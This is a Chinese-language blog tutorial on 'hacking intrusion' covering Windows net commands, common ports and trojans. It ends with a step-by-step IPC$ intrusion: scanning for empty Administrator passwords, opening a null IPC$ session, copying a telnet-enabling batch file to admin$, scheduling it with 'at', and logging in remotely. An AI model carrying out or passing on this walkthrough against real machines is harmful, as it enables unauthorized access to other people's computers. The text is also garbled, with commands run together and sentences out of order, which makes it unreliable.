黑客入侵技术及命令基础讲解 - 加班费的离开
View Post
第一节课:命令的使用
必需懂得一些命令才干更好地运用!总不能一边入侵一边去看例文吧!什么?喜欢?晕了~好了~下面就看看一些常用的命令吧!也就是入侵必需懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你长假去吧!
1.net
NET[ACCOUNTS│ COMPUTER│ CONFIG│ CONTINUE│ FILE│ GROUP│ HELP│
HELPMSG│ LOCA LGROUP│ NA ME│ PA USE│ PRINT│ SEND│ SESSION│
SHA RE│ STA RT│ STA TISTICS│ STOP│ TIME│ USE│ USER│ VIEW]
上面就是net命令.可以在cmd下键入net/?获得.看看一些常用的.
netuser\\列举所有用户\\例子:c:\>netuser
netlocalgroup\\把用户分组\\例子:c:\>netlocalgroupadministrguest/add\\把guest用户加到管理组.需要有足够的权限才干进行操作!\\
netshare\\显示共享资源\\例子:c:\>netshare
或显示已启动服务的列表\\例子:\>netstart例子:\>netstarttelnet\\启动telnet\netstart\\启动服务。\
netstop\\停止Windows2000网络服务\\例子c:\>netstoptelnet\\停止telnet服务\\
nettime\\显示时间\\例子:c:\>nettime127.0.0.1\\显示127.0.0.1时间\\
netus\\显示关于计算机连接的信息\\例子:c:\>netuse
netview\\显示域列表、计算机列表或者由指定计算机共享的资源\\例子:c:\>netview
OK?!!!好了~下课net基本命令就到此结束吧!但并不是说其它命令不用去学!只是基本教学(入侵)课程需要用的命令是这些而已~自己去window协助那里看看吧!DOS下的基本命令是很重要的!如:copi等.还有ftp等等重要的命令因为种种原因请各位自行去看.基本课程不能太复杂的.~
第二节课:端口和木马
A.第二节课了~这节课我首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我看网页用的实际上是80端口.
1telnet登录的端口 23/tcp
这里你可以远程登录到该主机这个信息标明远程登录服务正在运行。.
2WWW80/TCP端口
标明WWW服务在该端口运行
也就是说,别告诉我不知道WWW服务是什么哦。如果有网站的服务器都有80端口。
3FTP21/tcp
还可以从FTP服务器上获得或上传资料木马等,ftp服务和TELNET服务一样。有的还是匿名登陆的不过这样的好事好像不多。
4finger79/tcp端口
从它可以获得用户信息,finger服务对入侵者来说是一个非常有用的信息。检查机器的运行情况等。
5远程控制(3389
这个端口用于远程登陆.
135,还有一些常见的端口例如110.139,25等等等…..这次基础教程需要用到23端口.其它因为觉得重要所以也列举了进去.剩下的请自己去补补.不是不负责任.课程的问题!请谅解!PS:并不是所有的端口都是有用的.
B.木马
久久不能得手。后来想出了一个木马计,讲个故事给大家听吧!—->>传说希腊人围攻特洛伊城。让士兵躲藏于巨大的木马中。大部队假装撤离而将木马抛弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
木马的危害性是很大的!例如冰河等木马甚至可以远程控制你电脑!同时木马也会打开一些端口.也可以借检查端口来看看有没木马在电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~\\课程并不需要使用到木马.只是自己认为各位值得一学\\
第三节课:ipc入侵.
不需要那个家伙…好了~估计你看了那么多基础的东西已经很不耐烦了~这节课就来实行你第一次入侵吧!咳咳~放下你AK-47..
A.什么是ipc?
对于顺序间的通讯很重要。远程管理计算机和检查计算机的共享资源时使用.利用IPC$可以与目标主机建立一个空的连接(无需用户名与密码)而利用这个空的连接,就可以得到目标主机上的用户列表。用“流光”IPC$探测功能,IPC$共享“命名管道”资源。就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用你上两节课学到知识跟我冲吧!掌握好你命令使用了吗?
马上K!需要用的扫描软件:xscan操作系统:win2000不要告诉我那还是98或者me.
选择”设置”,首先我使用扫描器扫描一个IP段.打开xscan.再选”扫描模块”,然后只选nt弱口令的那项.确定后选”设置”,”扫描参数”然后填入IP段.就127.0.0.1-127.0.0.255吧!注意:IP段纯属虚构.
假设我已经扫到一个了.127.0.0.2用户名:A dministr密码:空(唉~真搞不清现在人为什么这么没安全意识…
输入:netus\\127.0.0.1\ipc$””/user:”A dministrator”命令胜利完成.OK!下一步打开cmd.~
at\\127.0.0.1\\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
输入如下内容netstarttelnet然后保管为a.bat\\注意扩展名!bat!\接下来我需要编辑一个批处理文件.打开记事本.\
编辑好后就继续吧!copia.bat\\127.0.0.1\admin$\\admin$就是放在目标winnt根目录下\\
nettime\\127.0.0.1\\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at\\127.0.0.120:01a.bat\\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
nettime\\127.0.0.1\\看看到时间没?\\
就实行下一步吧假设到.!
telnet127.0.0.1\\登陆到对方的机子上.刚才的那个批处理就是用来打开它23端口的~\\
接着输入用户名和密码 \\就是用户Administr啊!密码是空的.回车就行了~\\